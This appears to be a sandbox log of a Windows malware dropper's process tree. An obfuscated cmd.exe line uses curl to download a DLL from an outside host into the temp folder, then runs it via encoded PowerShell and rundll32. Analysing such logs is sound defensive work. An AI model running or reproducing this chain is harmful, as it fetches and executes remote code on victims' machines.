cmd.exe "C:\Windows\System32\cmd.exe" /c eEHJB || Ty0jNwy || piNg -n 2 8VlUL || piNg yetdfc || eCHo Z2qIopV & cUrL https://rimaflower.com/p4c/tacon -o %tMP%\Epidictic.dll & piNg -n 2 yetdfc || eCHo Epidictic & PoWeRSHelL -encodedcommand cgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABFAHAAaQBkAGkAYwB0AGkAYwAuAGQAbABsACwAIABUAGgAcgBvAHcA & EXIT
2252PING.EXE piNg -n 2 8VlUL
2388PING.EXE piNg yetdfc
2428curl.exe cUrL https://rimaflower.com/p4c/tacon -o C:\Users\test22\AppData\Local\Temp\Epidictic.dll
1624PING.EXE piNg -n 2 yetdfc
904powershell.exe PoWeRSHelL -encodedcommand cgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABFAHAAaQBkAGkAYwB0AGkAYwAuAGQAbABsACwAIABUAGgAcgBvAHcA
2740rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Epidictic.dll Throw
1376